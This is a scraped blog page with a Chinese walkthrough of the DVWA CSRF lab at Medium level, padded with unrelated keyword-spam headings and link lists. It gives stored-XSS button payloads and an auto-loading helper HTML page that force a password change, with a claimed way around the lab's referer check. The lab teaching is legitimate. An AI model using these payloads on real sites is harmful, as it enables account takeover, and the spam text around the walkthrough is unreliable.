当前位置: 首页 > news >正文

大数据网站建设网站建设玖金手指排名12

大数据网站建设,网站建设玖金手指排名12,西安十大广告设计公司,wordpress插件中心注意: 1、这里对XSS(Stored)关卡不熟悉的可以从这里去看http://t.csdn.cn/ggQDK 2、把难度设置成 Medium 一、这一关同样我们需要埋下伏笔,诱使用户点击来提交,首先从XSS(Stored)入手。 注意:在前面介绍…

注意:

1、这里对XSS(Stored)关卡不熟悉的可以从这里去看http://t.csdn.cn/ggQDK

2、把难度设置成  Medium

 一、这一关同样我们需要埋下伏笔,诱使用户点击来提交,首先从XSS(Stored)入手。

       注意:在前面介绍过如何进行XSS注入,这里就不再讲解。http://t.csdn.cn/gs8xX

二、在上low难度中,我们直接使用<a>标签来包裹修改密码的请求。但这一关<a>标签被过滤了。

所以,我们使用的是button标签来提交修改密码的链接。

<button Onclick="alert(11)">点我</button>

简单查看效果,可以触发

三、接下来是不是就简单了,在这里使用 location.href=“”  来提交类似第一关修改密码的GET请求不就ok?

构造payload:(注意这里的ip是web服务器的ip后面不要混淆)

<button Onclick=location.href="http://192.168.114.165/vulnerabilities/csrf/?password_new=9999&password_conf=9999&Change=Change">拿下</button>

解析:就是当用户点击这个按钮的时候,会自动提交一个修改密码的get请求,来修改当前用户的密码。 No matter who you are!

 注入,并查看结果:(经过验证确实在字符串的长度被限制了!)

        

四、所以果真没那么简单,话不多说直接看答案。

提示:

源码:

 用人话是这样说:

        1、第一关把整个GET请求藏进去没办法——长度限制

        2、需要多个连接来实现——不然怎么叫跨站呢?思路讲就是点击按钮让页面跳转到我在其他服务器(114.199)准备好的一个页面,用这个页面来向114.165服务器来提交GET请求。

        3、但是!从源码可以看到,这里有一个referer,比如我们用114.199服务器提交GET请求的时候,referer的ip会是114.199。所以也不会提交成功。

        4、所以我们要绕过referer。

五、首先在114.199服务器上面创建一个chage_192.168.114.165.html      的文件,用来绕过referer。这里的IP是靶场的IP。内容如下:

<script>// 向web服务器提交请求 function onlo(){location.href="http://192.168.114.165/vulnerabilities/csrf/?password_new=12581&password_conf=12581&Change=Change";}
</Script>
<body onload="onlo()">

解析:这个就相当于跨站脚本通过,当用户跳转到这个页面,这个页面马上就向Web靶场服务器一个修改密码的请求。来完成密码修改。

六、接下来构造payload

<button Onclick=location.href="http://192.168.114.199/change_192.168.114.165.html">拿下</button>

#注意修改IP地址。href=服务器上部署的那个脚本连接。

埋下伏笔!

 单击拿下,抓包查看。

 

 

拿下!

 

http://www.yayakq.cn/news/283878/

相关文章:

  • 网站后台策划书营销型网站建设哪家公司好
  • 做网批的网站集安网站制作
  • 怎么申请pc网站域名wordpress 邮件美化
  • 四川住房和城乡建设厅网站电话自学网站开发要多久
  • 北京双诚建设监理公司网站个人域名的网站
  • 太原心诺做网站wordpress 固定连接插件
  • 经典的响应式布局网站查看网站开通时间
  • 建设刷单网站佛山营销网站建设
  • wap手机网站制作西安网站开发
  • 网站网站制作开发需要哪些技术html5网站价格
  • 绍兴网站建设方案书越秀企业网站建设
  • 网站图片优化的概念高端装修公司门头设计效果图
  • 科技网站首页欣赏杭州网站开发与设计
  • 手表网站制作wordpress 图片特效插件
  • 重庆网站建站一站式服务网站建设app开发小程序开发
  • 全栈网站开发四川省建设工程质量与安全监督网站
  • 昆山网站建设公司动态图片wordpress插件
  • 安徽 网站制作最好的网站建设机构
  • 建设部网站 自住房小程序开发定制公司北京
  • 威海建设银行网站wordpress主题演示导入
  • 深圳网站推广策划网站开发建设类合同
  • 公司网站怎么建立需要多少钱天津网站优化哪家快
  • 如何申请一个网站 新网中国黄冈网
  • 网站建设的售后服务百度站长推送
  • 潍坊优化网站排名研究思路 网站建设
  • 教学网站怎么做公众号制作的网站开发
  • 哈尔滨网站开发联系薇网站的主要功能
  • 佛山网站建设玲念建站浦口区网站建设
  • 如何注册一个自己的网站如何提升网站转化率
  • 一个企业建设网站的目的什么是网站名称文件夹